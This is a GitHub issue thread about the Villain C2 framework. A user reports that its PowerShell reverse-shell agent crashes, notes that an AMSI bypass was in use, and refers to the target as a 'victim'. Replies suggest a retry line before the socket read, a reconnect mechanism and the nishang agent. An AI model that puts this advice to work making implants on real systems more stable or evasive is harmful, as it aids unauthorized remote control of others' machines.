search

t3l3machus / Villain

Villain is a high level stage 0/1 C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells, enhance their functionality with additional features (commands, utilities) and share them among connected sibling servers (Villain instances running on different machines).
Other
3.64k stars 590 forks source link

PowerShell Agent Unexpected Crashes: Issue with "Read" Method #147

Closed whydee86 closed 1 week ago

whydee86 commented 3 months ago

Description

The PowerShell agent generally operates smoothly, but I have encountered an issue where it unexpectedly crashes during execution. The crash is associated with an exception thrown when attempting to call the "Read" method with three arguments.

Steps to Reproduce

  1. Run the PowerShell agent under normal operation conditions.(Include amsi bypass, for sure it's not a defender problem)
  2. During its execution, the agent occasionally crashes with the above exception.

(Note: The issue appears to occur at random intervals, possibly influenced by network stability or remote server responses.)

Expected Behavior

The agent should handle network interruptions or reconnect attempts gracefully without crashing, possibly by implementing retry mechanisms or more robust error handling around the "Read" operation.

Actual Behavior

The agent crashes, leading to an abrupt termination of its execution. This disrupts workflows and requires manual intervention to restart the agent.

Looking forward to your support in resolving this issue. Thank you!

image

charbelmhanna commented 3 months ago

Based on the error I see it seems that the remote host as closed the connection mean that it stopped listening to the port. Also it could be a connection issues. Make the connection your connecting to "Victim" there no connection timeout ....

whydee86 commented 3 months ago

@whydee86, thanks a lot for the detailed issue description. Looks like one of the 3 arguments when calling read is null: $stream.Read($bytes, 0, $bytes.Length) Possibly the initialization of the $bytes byte array from the previous command did not complete in time, so when it gets to read it errors out? I'm kind of speculating for now. If that's true, then you can probably append this line (or similar) before the "read" command: while ($? -ne $true){sleep 0.5};.

I will have a closer look and get back to you.

Cheers

Great, if I can help with something or provide more information, please let me know. We should also add to the agent reconnect mechanism in case of network failure. For example, try stopping the server for 5 seconds and then start it again.

t3l3machus commented 3 months ago

@whydee86 by the way, you can probably use nishang as an agent to connect to Villain via tcp which is more sophisticated.